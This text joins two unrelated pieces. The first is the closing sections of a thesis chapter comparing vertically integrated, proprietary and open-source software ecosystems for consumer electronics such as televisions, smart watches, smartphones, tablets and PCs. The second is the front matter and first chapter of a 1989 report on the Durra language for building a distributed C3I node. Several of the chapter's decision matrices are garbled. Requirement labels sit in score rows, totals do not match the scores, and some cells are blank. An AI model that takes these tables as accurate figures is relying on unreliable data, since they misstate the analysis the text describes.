A large number of open source platforms have entered the market, including Android TV [Android 2014], Meego [Meego 2014], Ubuntu TV [UbuntuTV 2014] and XBMC [XMBC 2014]. Also vendors of proprietary platforms have entered the market, such as Horizon TV [Horizon 2014], Microsoft TV [TheVerge 2014A], and Yahoo! TV [YahooTV 2014]. Many of these platforms aim at both digital televisions and set-top boxes since these devices largely contain the same hardware and software components. A variety of platforms is used, where none has gained a dominant position. Recently a number
of firms, with a relatively small market share, have adopted the open source software platform Android, such as Philips, Sony and Sharp [Engadget 2014].
**Analysis of ecosystem type**
The development costs are high because these systems have to support a large range of broadcasting standards and require a large amount of software to efficiently create good picture quality with high frame rates and high pixel density. The variability is high because digital televisions are developed with different screen sizes and price settings, should be able to support different regional standards and should be able to operate together with many other products. System resources and hard real time requirements are evaluated as a main requirement because of the large pressure on cost price and because power consumption has to remain low, since cooling fans are not accepted in these products. Furthermore, showing video and playing audio needs to be done without visual or audible interruptions. Finally, the integration effort is high since a large number of components from different suppliers need to be integrated and a high degree of modularity has not been obtained.
**Table 6 Decision support matrix for digital televisions and set-top boxes**
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-2</td>
<td>-2</td>
<td>3</td>
<td>3</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>0</td>
<td>+3</td>
<td>2</td>
<td>2</td>
<td>2</td>
<td>2</td>
</tr>
</tbody>
</table>
Table 6 shows that the open source software type scores best on most aspects, directly followed by the vertically integrated platform type. This analysis is in contrast with current practice, in which the vertically integrated platform type is most used and the two major players, Samsung and LG, own 40% of the market share [Strategy 2014]. We believe that this is caused by commercial reasons, i.e. the manufacturers are reluctant to use an open source or proprietary platform for fear that a dominant firm may take most of the revenues. Furthermore the investments to switch from an existing platform to a new one are significant and the major players have a large market share, thus causing little commercial pressure.
The main player in this market, i.e. Samsung [Strategy 2014], uses a proprietary platform which is based on the open source platform Tizen [Samsungforum 2014]. Consequently, Tizen may become an important candidate to dominate this market and a battle for dominance with Android may be expected [Information 2014A].
3.5.4 Smart Watches
Product description and historical overview
Smart watches have been introduced in recent years but already exist in a wide variety. The functionality of most watches is, in addition to displaying the time, focused on showing notifications of incoming calls and messages [Theguardian 2014], while some watches are able to play music, take pictures and can be used for telephone conversations, such as the Samsung Gear [Androidwatches 2015]. A selection of watches is focused on fitness and health by monitoring heart rate and physical activity, such as the Pebble and the Basis Peak [Pebble 2015, Mybasis 2015]. Apple introduced the Apple Watch that can be used for contactless payment [AppleWatch 2015], which was earlier introduced for smart phones [Trustedreviews 2014].
While the functions of smart watches are currently limited in comparison with smart phones, a major architectural challenge is size and battery lifetime. As a consequence special operating systems have been introduced to accommodate this. At this moment in time there is no dominant platform: Google has introduced Android Wear, which was first used by firms such as Samsung, LG and Motorola [Androidwatches 2014]. Samsung also started using the open source platform Tizen [TheVerge 2014B]. By using this platform, for which Samsung acts as main contributor, it has more control over the platform and is not dependent on Google. Other firms, such as Apple, Sony and Pebble, use a proprietary platform [Pebble 2014, AppleWatch 2014, Connectedly 2014].
Analysis of ecosystem type
The variability is evaluated as key because watches with different functionality, size, price setting etcetera are needed to satisfy the different customer needs, and because watches are often a personal statement, which is why Android Wear is not considered sufficiently modifiable by some vendors [Johnson 2015]. The speed of innovation is high because these products are new and it is uncertain which functionality will become successful in the market. The use of system resources and hard real time requirements is evaluated as a key requirement, given the size of these devices and the increasing number of ICs that are used in these products. Currently most smart watches need to be charged daily even when they are not used continuously.
Table 7 Decision support matrix for smart watches
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. Cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-2</td>
<td>+1</td>
<td>+2</td>
<td>+1</td>
<td>+1</td>
<td></td>
<td></td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-</td>
<td>-2</td>
<td>-3</td>
<td>n.a.</td>
<td></td>
<td></td>
<td>n.a.</td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+2</td>
<td>0</td>
<td>+2</td>
<td>+4</td>
<td>1</td>
<td></td>
<td></td>
<td>1</td>
<td></td>
</tr>
</tbody>
</table>
Table 7 shows that the open source platform type is most suitable since this offers the consumer electronics and watch manufacturers the best option to create distinguishable products. In the current market multiple open source platforms as well as multiple vertically integrated platforms are used; however, little is known about the market shares. A proprietary software platform type is not available and, based on this analysis, this type is unlikely to become successful in this market, especially because it is difficult for this type to support the requirements for optimal use of system resources.
3.5.5 Smart phones
Product description and historical overview
A description of the transition in the industry is already given in section 3.3.1. This subsection is limited to the trends in functionality: Initially the functionality of these products was limited to making telephone calls and sending messages via SMS. Around 1996 the so-called feature phones were introduced that supported downloadable ringtones, playing music and games. A major shift occurred when functionality was incorporated that was previously available in personal digital assistants (PDAs), such as a Wi-Fi connection, GPS and, at a later stage, touch screens. As a result, the mobile phone, now called smart phone, attracted a large group of users, who use their devices for a variety of tasks such as taking pictures, using social media and communicating with friends and others via WhatsApp and Twitter.
Analysis of ecosystem type
The development costs and innovation are evaluated as of high importance given the continuous effort that is needed to introduce new functionality. The use of system resources and hard real time requirements is evaluated as high, given the size of these devices and the need for a long battery lifetime. The interface stability is regarded as an important requirement because application developers should be able to rely on their product functioning on the different devices, to amortize their investments. The variability is evaluated as key because phones with different functionality, size, price setting, quality of the camera, design etcetera need to be supported, and users typically buy a product that exactly serves their needs.
Table 8 Decision support matrix for smart phones
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>Vertical Integrated</td>
<td>High</td>
<td>Key</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>0</td>
<td>-1</td>
<td>0</td>
<td>2</td>
</tr>
<tr>
<td>Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>3</td>
</tr>
<tr>
<td>Open Source Software</td>
<td>+1</td>
<td>+2</td>
<td>0</td>
<td>+1</td>
<td>-1</td>
<td>+3</td>
<td>+3</td>
<td>+3</td>
<td>1</td>
</tr>
</tbody>
</table>
Table 8 shows that for smartphones the open source platform type is evaluated as most suitable. This analysis reflects the market share of 2013 [Gartner 2014]: open source software has 79% of the market, the vertically integrated platforms 18%, and a proprietary platform, i.e. Microsoft, 3%.
The overview also shows the challenges for each ecosystem type:
- For the vertically integrated type, development costs and variability are the main challenges. Apple, a key player, addresses this by limiting the variability and development costs, by focusing on particular market segments and by only supporting the latest versions of the handsets [Grobart 2013].
- For the proprietary software type these challenges are innovation and system resources. Microsoft addresses this by closely cooperating with a small group of hardware platform suppliers [Duryee 2009] and by acquiring Nokia, a previously vertically integrated firm.
- For the open source software type, interface stability and fragmentation are the main challenges. Google, the main open source supplier, addresses this by offering a compatibility test suite [AndroidComp 2014] and by making agreements with handset makers to use standard Google apps and user interface [Gannes 2014].
3.5.6 Tablets
Product description and historical overview
Tablets were introduced two decades ago by traditional computer manufacturers but did not gain much traction in the market in the first decade [Zdnet 2014]. With the introduction of the iPad by Apple, this product category became widely used. Soon other manufacturers followed that, similarly to Apple, used the same platform for tablets as for smart phones.
Tablets, especially with larger screens, are used for different purposes than smart phones. Smart phones are primarily used, besides making telephone calls, for taking and sharing pictures, sending messages and so forth. Tablets are more used for answering mail, reading books and magazines, and watching and editing pictures. Therefore, tablets are increasingly used in schools and in business environments and often replace books and personal computers [Washingtonpost 2014, Information 2014B].
Chapter 3
Analysis of ecosystem type
Development costs are evaluated as high given the continuous effort to introduce new functionality. The interface stability is also evaluated as high because these products are starting to replace laptops and are used in schools and for business applications. Variability is also an important requirement, since tablets are offered with different price settings, screen sizes, and so on.
Table 9 Decision support matrix for tablets
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>-1</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>2</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>3</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>-1</td>
<td>+1</td>
<td>+1</td>
<td>1</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Table 9 shows that there is no difference in the total score between the three ecosystem types. In comparison with smart phones, the interface stability is also regarded as an important requirement, while system resources are less important because tablets have more options for heat dissipation and larger batteries.
In the current market there is only one vertically integrated player with a sizeable market share, i.e. Apple. For this type the interface stability is a big advantage over the open source platform type which is visible because schools use the iPad rather than an Android device [Washingtonpost 2014]. As an example: To accommodate the use of iPad in schools and business environments, Microsoft has ported Microsoft Office for the iPad, rather than for Android which has a larger market share, because of the fragmentation of the Android platform [Appleinsider 2014].
The market shares for tablets reflect these differences: in comparison with smart phones, both the vertically integrated platform, i.e. Apple, and the proprietary software platform have a larger market share [Thenextweb 2014, Theregister 2014]. However, the share of the proprietary software platform is (still) very small.
For the vendor of the proprietary platform, i.e. Windows, this can be a very viable market, much more than smart phones, since the interface stability is regarded as important, while optimal use of system resources is less important because of the size of these products. Therefore targeting this market with a proprietary platform is expected to be more successful than targeting the smart phone market as well, which is the current strategy of Microsoft [BBCNews 2014].
3.5.7 Personal Computers
Product description and historical overview
Personal computers were originally developed by vertically integrated firms, but with the introduction of Microsoft's MS-DOS and the modularization of the PC's hardware an ecosystem was created, the so-called Wintel platform [Baldwin 1997].
The innovation of PCs has been small for more than a decade and consumers only switch to a new product when the old system is becoming too slow or does not support the software that they need to use. This often leads to new versions of operating systems that are not adopted by businesses and only to a limited extent by consumers. For instance, Windows Vista was hardly adopted in business environments. In this market one proprietary software platform is present, i.e. Microsoft Windows, and only one vertically integrated platform type, i.e. Apple. Also some open source software vendors are present, e.g. Linux, Chrome OS and FreeBSD.
Analysis of ecosystem type
Development cost: development costs are evaluated as high because PCs should be able to support a wide range of products, require frequent updates for security reasons, and so on. Furthermore, users only switch to a new version when it is really needed, making it difficult to amortize the investments. Quality is evaluated as high, since these products have to support business-critical applications. Interface stability is evaluated as an absolute must, because a user or company has to be able to rely on a purchased application functioning correctly, and continuing to function over a long period of time.
Table 10 Decision support matrix for personal computers
<table>
<thead>
<tr>
<th></th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
<tr>
<th>Important requirements</th>
<th>High</th>
<th>High</th>
<th></th>
<th></th>
<th></th>
<th>Key</th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Vertically Integrated</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>+2</td>
<td></td>
<td></td>
<td>+2</td>
<td></td>
<td>2</td>
<td></td>
</tr>
<tr>
<td>Open Source Software</td>
<td>+1</td>
<td>0</td>
<td>-2</td>
<td></td>
<td>-1</td>
<td>+2</td>
<td></td>
<td>3</td>
<td></td>
</tr>
</tbody>
</table>
Table 10 shows that the proprietary software type scores higher than the vertically integrated and open source software types. In the market, Microsoft has the largest share, around 90%, with Apple's personal computers just below 10% [Theregister 2014]. Open source software platforms are marginally used. Although the open source ecosystem type has benefits, its disadvantage, i.e. interface stability, concerns a key requirement and makes it unlikely that this type gains a significant market share. The only open source software platform with some success is the Chromebook, which is completely focused on using a personal computer as a client for web usage [Chrome 2015], and therefore relies on HTML as a stable interface. A native API is not offered.
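The decision support matrices in this chapter rank ecosystem types by summing per-criterion scores relative to the vertically integrated baseline. The sketch below illustrates that scoring mechanics only; the criterion names follow the tables, but the weights and example scores are illustrative assumptions, not the thesis's actual values.

```python
# Illustrative sketch of the multi-criteria scoring used in the decision
# support matrices. Scores are relative to the vertically integrated
# baseline, which scores 0 on every criterion. The example values below
# are placeholders, not the values from Table 10.

CRITERIA = ["dev_cost", "quality", "variability", "innovation",
            "system_resources", "interface_stability", "integration_effort"]

def total_score(scores):
    """Sum the per-criterion scores of one ecosystem type."""
    return sum(scores.get(c, 0) for c in CRITERIA)

# Hypothetical scores for one product category:
proprietary = {"variability": +2, "interface_stability": +2, "system_resources": -2}
open_source = {"dev_cost": +1, "variability": +2, "interface_stability": -2}

ranking = sorted(
    [("proprietary", total_score(proprietary)),
     ("open_source", total_score(open_source)),
     ("vertically_integrated", 0)],
    key=lambda t: t[1], reverse=True)
print(ranking)
```

A fuller model would also weight criteria by their importance for the product category (the "Important requirements" row), which this sketch omits.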
3.6 Comparison with Related Art
In our previous work [Hartmann 2012] we analyzed the transition of mobile devices from 1990 until 2010, whereas the current paper analyzes the situation of today. In [Hartmann 2012] we introduced a model consisting of 5 industry structure types, ranging from vertically integrated to closed and open ecosystems. The different types of ecosystems in the current paper are a refinement of the two ecosystem types described in that paper, where the vertically integrated hardware/software ecosystem type is based on a vertically integrated platform but has created a standardized interface for 3rd parties to contribute. In that earlier work the difference between proprietary and open source platform types was not identified.
Another previous work by the co-author [Bosch 2010] describes architectural challenges. Some of these challenges have been used in the current paper as criteria that determine the best suitable scope. However, in that work the criteria were not identified for mobile devices or embedded systems.
In the work of Knauss and Hammouda [Knaus 2014] an assessment method is introduced that determines the suitability of a software architecture for an ecosystem-centric approach. In their work they addressed the tradeoff between the degree of openness of a software platform and reasons to limit that freedom. Their work did not include a comparison between different types of ecosystems for consumer electronics products.
The work of Gawer and Cusumano [Gawer 2008] discusses the scope and technology design of a platform but does not discuss implications for software engineering nor does this work identify or compare different types of ecosystems for consumer electronics products. Other related work identified different types of ecosystems [Baldwin 1997, Jansen 2012, Bosch 2009] but did not compare ecosystems in a particular domain nor did it identify the challenges from a software engineering perspective.
To our knowledge there is no related art that analyzes different types of ecosystems for consumer electronics, nor related work that contains a decision support model for different types of ecosystems; therefore this paper is one of the first of its kind.
3.7 Conclusions and Further Research
In this paper we identified three different types of ecosystems for consumer electronics to support 3rd party applications and identified the criteria that determine the best suitable scope and technology design from a software engineering perspective. Based on this analysis we introduced a first step towards a multi-criteria decision support method to determine the most suitable ecosystem type for consumer electronics products and used this method to analyze a wide range of products. Although our decision support method is not complete at this moment in time, and further research is needed, the analysis using this method already revealed essential differences between the types of ecosystems and their suitability for different product types.
This analysis shows that when the speed of innovation is a key requirement while variability is less important, the vertically integrated hardware/software type is more suitable. This is the case for gaming consoles.
For product types that require a high degree of variability and when it is needed to share the development investment of the platform between multiple firms, the open source software type is more suitable. Examples of such products are digital photo cameras, digital televisions, smart watches and smart phones.
For product types for which a stable interface is a key requirement, and development costs and quality are also important requirements, the proprietary software platform type is most suitable. This has been analyzed to be the case for personal computers. The proprietary software platform is less suitable for traditional consumer electronics products given the high pressure on cost price, which requires ICs with a small footprint and optimal use of system resources. On the other hand, open source software platforms are unlikely to gain a dominant position in the market of PCs, since interface stability is a key requirement, which is difficult to achieve for this ecosystem type.
For tablets, all three ecosystem types are considered equally suitable since these products have characteristics of both smart phones and personal computers.
While the choice of an ecosystem type is also, and possibly even more, determined by commercial and organizational aspects, in most cases the type that was considered most suitable using our decision support method turned out to be the type that is most used in the market. This provides confidence that the introduced model is a sound first step.
The case studies also showed how the individual requirements influence the market and the choices of consumer electronics firms and software vendors. For instance, the development cost challenge for gaming consoles means that just a few players are active. In the smart phone and tablet domain, Apple focuses on a limited variety of products, Microsoft took over an existing hardware firm to be able to act as a vertically integrated HW/SW ecosystem type, and Google offers a compatibility test suite and makes agreements with handset makers to use standard Android in order to avoid fragmentation.
A primary topic for further research is to include business and organizational aspects in a decision support model. Further research may also reveal more relevant criteria. Furthermore, an evaluation based on the opinions of more experts, and a more fine-grained analysis of the importance of the criteria, will provide higher confidence in the results of the analysis. Due to these limitations, we consider the method introduced in this paper a first step towards a full-fledged decision support method.
In the categorization and comparison of ecosystem types, a strict separation was made between open source and proprietary closed source. However, software vendors may use a mixed approach, in which part of the software is proprietary, e.g. to create a stable interface towards the 3rd party application developers, while other parts can be used without restrictions. Similarly a vendor may decide that a certain part of the closed source platform may be modified, e.g. to more easily support different hardware configurations. These mixed approaches will lead to a combination of both types of ecosystems. More research is needed to identify the consequences for each of these ecosystem types.
The key contributions of this paper are threefold:
(1) Three types of ecosystems are identified that are used in consumer electronics to support 3rd party applications.
(2) A first step towards a multi-criteria decision support method is introduced to select the most suitable ecosystem type for a product category, from a software engineering perspective.
(3) Case studies of seven consumer electronics products are presented and a comparison is made between the suitability of the types that are used in traditional consumer electronics products with those that are used in mobile devices and personal computers.
Firms that create consumer products and are considering adopting an ecosystem-centric approach can use the method presented in this paper to choose the type of ecosystem that suits the market demands best and to address the challenges that arise as a result of this choice. Especially in an emerging market where no dominant ecosystems are available, such a choice is non-trivial and of crucial strategic importance.
Firms that create software platforms can use this method to target the product types for which their platform is most suitable and proactively address the identified challenges to make their platform successful in the market.
Part II: Variability Management in Software Supply Chains
“It is not necessary to change. Survival is not mandatory.”
W. Edwards Deming
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Mario R. Barbacci
Dennis L. Doubleday
Charles B. Weinstock
Steven L. Baur
David C. Bixler
Michael T. Heins
February 1989
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Mario R. Barbacci
Dennis L. Doubleday
Charles B. Weinstock
Software for Heterogeneous Machines Project
Software Engineering Institute
Steven L. Baur
David C. Bixler
Michael T. Heins
Reusable C^3I Node Project
TRW Defense Systems Group
Approved for public release.
Distribution unlimited.
**Table of Contents**
1. Introduction to Durra
1.1. Type Declarations
1.2. Task Descriptions
1.3. Scenario
1.4. Runtime Components
1.4.1. The Scheduler
1.4.2. The Server
1.4.3. Application Tasks
2. Introduction to the TRW C³I Testbed
2.1. C³I Node Hardware Architecture
2.2. C³I Node Software Architecture
3. Task and Application Descriptions
3.1. A Simple Task Description and Its Implementation
3.2. A Compound Task Description and Its Structure
3.3. An Application Description
4. Software Development Methodologies
4.1. Durra as a Tool for Successive Refinement
4.2. Incremental Development of the C³I Node
5. Conclusions and Future Developments
5.1. Basic Demonstration
5.2. Study of Advanced Networking Issues
5.3. Advanced Demonstration
References
Appendix A. C³I Node Application Description
Appendix B. Application Message Handler Description
B.1. Subsystem Description
B.2. Component Task Descriptions
B.2.1. Control Task
B.2.2. Inbound Message Task
B.2.3. Outbound Message Task
Appendix C. Communications
C.1. Subsystem Description
C.2. Component Task Descriptions
C.2.1. Control Task
C.2.2. Inbound Message Task  48
C.2.3. Outbound Message Task  48
Appendix D. System Manager Description  49
Appendix E. Workstation Description  51
E.1. Subsystem Description  51
E.2. Component Task Descriptions  51
E.2.1. Manager Task  51
Appendix F. Type Declarations  53
Appendix G. Scheduler Interface for Ada Task Implementations  55
## List of Figures

| Figure | Title | Page |
|---|---|---|
| Figure 1-1: | Compilation of an Application Description | 2 |
| Figure 1-2: | Durra Type Declarations | 2 |
| Figure 1-3: | A Template for Task Descriptions | 3 |
| Figure 1-4: | Compound Task Description | 4 |
| Figure 1-5: | Scenario for Developing an Application in Durra | 6 |
| Figure 1-6: | The Durra Runtime Environment | 7 |
| Figure 2-1: | C³I System Structure — Army Tactical System | 13 |
| Figure 2-2: | Reusable C³I Node Architecture Layers | 14 |
| Figure 2-3: | Data Flow Among Nodal Software Components | 15 |
| Figure 3-1: | AMHS_Control Task Description | 19 |
| Figure 3-2: | AMHS_Control Task Implementation | 21 |
| Figure 3-3: | Sample Sequence of Port Operations | 22 |
| Figure 3-4: | AMHS Subsystem Description | 23 |
| Figure 3-5: | C³I Node Description | 25 |
| Figure 3-6: | C³I Node Structure | 26 |
| Figure 4-1: | Initial Application Description | 29 |
| Figure 4-2: | Initial Task Descriptions | 31 |
| Figure 4-3: | Final Structure of the C³I Node | 32 |
| Figure 4-4: | Incremental Development of the C³I Node — Sequence 1 | 33 |
| Figure 4-5: | Incremental Development of the C³I Node — Sequence 2 | 34 |
| Figure 4-6: | Incremental Development of the C³I Node — Sequence 3 | 35 |
Command, Control, Communications, and Intelligence Node: A Durra Application Example
Abstract: Durra is a language designed to support the construction of distributed applications using concurrent, coarse-grain tasks running on networks of heterogeneous processors. An application written in Durra describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
This report describes an experiment in implementing a command, control, communications and intelligence (C³I) node using reusable components. The experiment involves writing task descriptions and type declarations for a subset of the TRW testbed, a collection of C³I software modules developed by TRW Defense Systems Group. The experiment illustrates the development of a typical Durra application. This is a three-step process: first, a collection of tasks (programs) is designed and implemented (these are the testbed programs); second, a collection of task descriptions corresponding to the task implementations is written in Durra, compiled, and stored in a library; and finally, an application description is written in Durra and compiled, resulting in a set of resource allocation and scheduling commands to be interpreted at runtime.
This report illustrates the methodology for building complex, distributed systems supported by Durra. It does not, however, illustrate all the features of the language; in particular, it does not illustrate those features that support dynamic, but planned, reconfiguration of a running application, or those features supporting unplanned dynamic reconfigurations as a means to support fault tolerance. These considerations are the subject of current design and development and will be the subject of a future report.
1. Introduction to Durra
Durra [1, 2] is a language designed to support the construction of distributed applications using concurrent, coarse-grained tasks running on networks of heterogeneous processors. An application written in Durra selects and reuses task descriptions and type declarations stored in a library. The application describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
Because tasks are the primary building blocks, we refer to Durra as a task-level description language. We use the term "description language" rather than "programming language" to emphasize that a Durra application is not translated into object code in some kind of executable (conventional) "machine language." Instead, a Durra application is a description of the structure and behavior of a logical machine to be synthesized into resource allocation and scheduling directives that are then interpreted by a combination of software, firmware, and hardware in each of the processors and buffers of a heterogeneous machine. This is the translation process depicted in Figure 1-1.
1.1. Type Declarations
The data types transmitted between the tasks are declared independently of the tasks. In Durra, these data type declarations specify scalars (of possibly variable length), arrays, simple record types, or unions of other types, as shown in Figure 1-2.
```
type packet is size 128 to 1024;
-- Packets are of variable length.
type tails is array (5 10) of packet;
-- Tails are 5 by 10 arrays of packets.
type rec is record (rows: integer, columns: integer, data: packet);
-- Rec data consists of two integers and a packet.
type mix is union (heads, tails);
-- Mix data could be heads or tails.
```
**Figure 1-2:** Durra Type Declarations
1.2. Task Descriptions
Task descriptions are the building blocks for applications. A task description includes the following information (Figure 1-3): (1) its interface to other tasks (ports); (2) its attributes; (3) its functional and timing behavior; and (4) its internal structure, thereby allowing for hierarchical task descriptions.
```
task task-name
ports
port-declarations
attributes
attribute-value-pairs
behavior
functional specification
timing specification
structure
process-declarations
bind-declarations
queue-declarations
reconfiguration-statements
end task-name
```
Figure 1-3: A Template for Task Descriptions
The interface information declares the ports of the processes instantiated from the task. A port declaration specifies the direction and type of data moving through the port. An in port takes input data from a queue; an out port deposits data into a queue:
```
ports
in1: in heads;
out1, out2: out tails;
```
The attribute information specifies miscellaneous properties of a task. Attributes are a means of indicating pragmas or hints to the compiler and/or scheduler. In a task description, the developer of the task lists the actual value of a property; in a task selection, the user of a task lists the desired value of the property. Example attributes include author, version number, programming language, file name, and processor type:
```
attributes
author = "jmw";
implementation = "program_name";
Queue_Size = 25;
```
The behavioral information specifies functional and timing properties about the task. The functional information part of a task description consists of a pre-condition on what is required to be true of the data coming through the input ports, and a post-condition on what is guaranteed to be true of the data going out through the output ports. The timing expression describes the behavior of the task in terms of the operations it performs on its input and output ports.
For additional information about the syntax and semantics of the functional and timing behavior description, see the Durra reference manual [1].
The structural information defines a process-queue graph (e.g., Figure 1-1) and possible dynamic reconfiguration of the graph as shown in Figure 1-4.
```
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
structure
process
cc : task comm_control;
ci : task comm_inbound;
co : task comm_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = cc.SM_In;
SM_Responses = cc.SM_Out;
Inbound = ci.Inbound;
Outbound = co.Outbound;
queue
q1 : cc.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ci.Cmd_In;
q3 : pb.out2 >> cc.Cmd_In;
q4 : ci.Resp_Out >> pm.in1;
q5 : cc.Resp_Out >> pm.in2;
q6 : pm.out1 >> cc.Resp_In;
q7 : cc.Echo_Out >> ci.Echo_In;
end comm;
```
Figure 1-4: Compound Task Description
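The structure section of the `comm` task above defines a process-queue graph. As a sanity check on that structure, the sketch below models the graph in Python; the process and port names mirror Figure 1-4, while the dictionary representation and the validation helper are illustrative assumptions, not part of Durra.

```python
# Minimal model of the process-queue graph declared in the `comm` task
# (Figure 1-4). Processes map an instance name to its task; each queue
# connects an output port of one process to an input port of another.

processes = {"cc": "comm_control", "ci": "comm_inbound",
             "co": "comm_outbound", "pb": "broadcast", "pm": "merge"}

queues = {
    "q1": ("cc.Cmd_Out",  "pb.in1"),
    "q2": ("pb.out1",     "ci.Cmd_In"),
    "q3": ("pb.out2",     "cc.Cmd_In"),
    "q4": ("ci.Resp_Out", "pm.in1"),
    "q5": ("cc.Resp_Out", "pm.in2"),
    "q6": ("pm.out1",     "cc.Resp_In"),
    "q7": ("cc.Echo_Out", "ci.Echo_In"),
}

def endpoints_valid(queues, processes):
    """Check that every queue endpoint names a declared process."""
    return all(src.split(".")[0] in processes and dst.split(".")[0] in processes
               for src, dst in queues.values())

print(endpoints_valid(queues, processes))
```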
A process declaration of the form
```
process_name : task task_selection
```
creates a process as an instance of the specified task. Since a given task (e.g., convolution) might have a number of different implementations that differ along different
dimensions such as algorithm used, code version, performance, or processor type, the task selection in a process declaration specifies the desirable features of a suitable implementation. The presence of task selections within task descriptions provides direct linguistic support for hierarchically structured tasks.
A queue declaration of the form

```
queue_name [queue_size]: port_name_1 > data_transformation > port_name_2
```

creates a queue through which data flow from an output port of a process (port_name_1) into the input port of another process (port_name_2). Data transformations are operations applied to data coming from a source port before they are delivered to a destination port.
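These queue semantics — a bounded buffer between an output port and an input port, with an optional transformation applied in transit — can be mimicked in a few lines. This is an illustrative sketch, not Durra's implementation; `make_queue` and the uppercasing transformation are invented for the example.

```python
# Sketch of a Durra-style queue: data sent on a producer's output port
# passes through a transformation before being buffered for the consumer.
import queue

def make_queue(size, transform=lambda x: x):
    buf = queue.Queue(maxsize=size)     # bounded intermediate buffer
    def send(data):                     # producer's output-port operation
        buf.put(transform(data))
    def receive():                      # consumer's input-port operation
        return buf.get()
    return send, receive

send, receive = make_queue(25, transform=lambda pkt: pkt.upper())
send("heads")
print(receive())
```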
A port binding of the form

```
task_port = process_port
```

maps a port on an internal process to a port defining the external interface of a compound task.
Although not illustrated in the figure, Durra provides a reconfiguration statement of the form

```
if condition then
  remove process-names
  process process-declarations
  queues queue-declarations
end if;
```
as a directive to the scheduler. It is used to specify changes in the current structure of the application (i.e., process-queue graph) and the conditions under which these changes take effect. Typically, a number of existing processes and queues are replaced by new processes and queues, which are then connected to the remainder of the original graph. The reconfiguration predicate is a Boolean expression involving time values, queue sizes, and other information available to the scheduler at runtime.
1.3. Scenario
We see three distinct phases in the process of developing an application using Durra: the creation of a library of tasks, the creation of an application using library tasks, and the execution of the application. These three phases are illustrated in Figure 1-5.
During the first phase, the developer writes descriptions of the component tasks and declarations of the data types. The type declarations specify the kinds of data that will be produced and consumed by the tasks in the application. The task descriptions specify the properties of the task implementations (programs). For a given task, there may be many implementations, differing in programming language (e.g., C or assembly language), processor type (e.g., Motorola 68020 or IBM 1401), performance characteristics, or other attributes. For each implementation of a task, a description must be written in Durra, compiled, and entered in the library.
During the second phase, the user writes an *application description*. Syntactically, an application description is a single task description and could be stored in the library as a new task. This allows writing of hierarchical application descriptions. When the application description is compiled, the compiler generates a set of resource allocation and scheduling commands or instructions to be interpreted by the scheduler.
During the last phase, the scheduler loads the task implementations (i.e., programs corresponding to the component tasks) into the processors and issues the appropriate commands to execute the programs.
1.4. Runtime Components
There are three active components in the Durra runtime environment: the application tasks, the Durra server, and the Durra scheduler. Figure 1-6 shows the relationship among these components.

After compiling the type declarations, the component task descriptions, and the application description, as described previously and illustrated in Figure 1-5, the application can be executed by performing the following operations:
1. The component task implementations must be stored in the appropriate processors.
